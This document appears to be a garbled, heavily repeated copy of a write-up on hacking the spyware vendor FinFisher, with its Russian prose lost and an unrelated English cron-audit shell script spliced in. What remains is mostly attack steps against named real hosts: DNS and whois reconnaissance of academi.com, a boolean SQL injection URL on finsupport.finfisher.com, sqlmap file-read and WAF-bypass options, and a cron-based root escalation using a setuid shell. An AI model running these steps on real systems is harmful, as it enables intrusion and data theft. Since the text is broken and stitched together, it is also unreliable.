40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
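The cron finding quoted above (a script in /etc/cron.hourly that cron runs as root but that the web server account can write) is the clearest recoverable point in this section, so here is the check a system owner would run to catch that class of misconfiguration first. This is an added example, not code from the original write-up or from unix-privesc-check. The RISKY output format, the TRUSTED_UID variable, the --system flag, and the fixture's script names and contents are assumptions made here; the fixture borrows the webalizer and mgmtlicensestatus names only to mirror the shape of the quoted warning, and its data is constructed, not taken from any real host.

```shell
#!/bin/sh
# Added example; not code from the original write-up or from unix-privesc-check.
# Defender-side counterpart of the finding quoted above: cron executes every
# file in /etc/cron.hourly (and the other drop-in directories) as root, so a
# script there that a non-root account can modify is a root-escalation path.
# This audit flags each drop-in directory, and each entry in it, that is owned
# by an account other than the trusted uid or is group- or world-writable.
# Only POSIX tools are used (ls -ldn, awk), so it does not depend on GNU stat.

# Owner uid that is allowed to write cron scripts; root by default. The
# self-test overrides it so the check behaves the same whoever runs it.
TRUSTED_UID="${TRUSTED_UID:-0}"

# perm_bits PATH -> the 10-character mode string, e.g. -rwxrwxr-x
perm_bits() { ls -ldn "$1" | awk '{ print substr($1, 1, 10) }'; }

# owner_uid PATH -> numeric uid of the owner
owner_uid() { ls -ldn "$1" | awk '{ print $3 }'; }

# is_risky PATH -> true (0) if an account other than TRUSTED_UID could modify it
is_risky() {
    mode=$(perm_bits "$1")
    uid=$(owner_uid "$1")
    if [ "$uid" != "$TRUSTED_UID" ]; then
        return 0                       # owned by someone else
    fi
    case "$mode" in
        ?????w????) return 0 ;;        # group write bit (position 6)
        ????????w?) return 0 ;;        # other write bit (position 9)
    esac
    return 1
}

# audit_cron_dirs [DIR ...] -> prints one "RISKY <mode> uid=<uid> <path>" line
# per finding; returns 1 if anything was flagged, 0 if the tree is clean.
# Without arguments it checks the standard system directories.
audit_cron_dirs() {
    found=0
    if [ "$#" -eq 0 ]; then
        set -- /etc/cron.hourly /etc/cron.daily /etc/cron.weekly \
               /etc/cron.monthly /etc/cron.d
    fi
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # The directory itself is checked too: anyone who can create a file in
        # it gets a root cron job without touching an existing script.
        for entry in "$dir" "$dir"/*; do
            [ -e "$entry" ] || continue
            if is_risky "$entry"; then
                echo "RISKY $(perm_bits "$entry") uid=$(owner_uid "$entry") $entry"
                found=1
            fi
        done
    done
    return "$found"
}

# count_risky DIR -> number of findings for DIR (prints 0 when clean)
count_risky() { audit_cron_dirs "$1" | grep -c '^RISKY' || true; }

# make_fixture -> builds a constructed stand-in for /etc/cron.hourly in a
# temporary directory (sample data, not a real system) and prints its path:
# one clean script and two that reproduce the shape of the finding above.
make_fixture() {
    root=$(mktemp -d)
    mkdir "$root/cron.hourly"
    chmod 755 "$root/cron.hourly"
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$root/cron.hourly/logrotate"
    chmod 755 "$root/cron.hourly/logrotate"           # clean: owner-only write
    printf '#!/bin/sh\n/usr/bin/webalizer\n' > "$root/cron.hourly/webalizer"
    chmod 777 "$root/cron.hourly/webalizer"           # risky: world-writable
    printf '#!/bin/sh\n/usr/local/bin/mgmtlicensestatus\n' > "$root/cron.hourly/mgmtlicensestatus"
    chmod 775 "$root/cron.hourly/mgmtlicensestatus"   # risky: group-writable
    echo "$root/cron.hourly"
}

# Run against the live system when invoked as: sh cron_audit.sh --system
if [ "${1:-}" = "--system" ]; then
    audit_cron_dirs
fi
```

Run it as root with `sh cron_audit.sh --system`; a non-zero exit means at least one drop-in directory or script can be modified by an account other than root. The remediation for each RISKY line is `chown root:root` plus a mode with no group or world write bit (the fixture's clean entry, 755, shows the expected state), and the same check belongs in a periodic compliance job since a package post-install script or an admin's stray chmod can reintroduce the problem.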
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
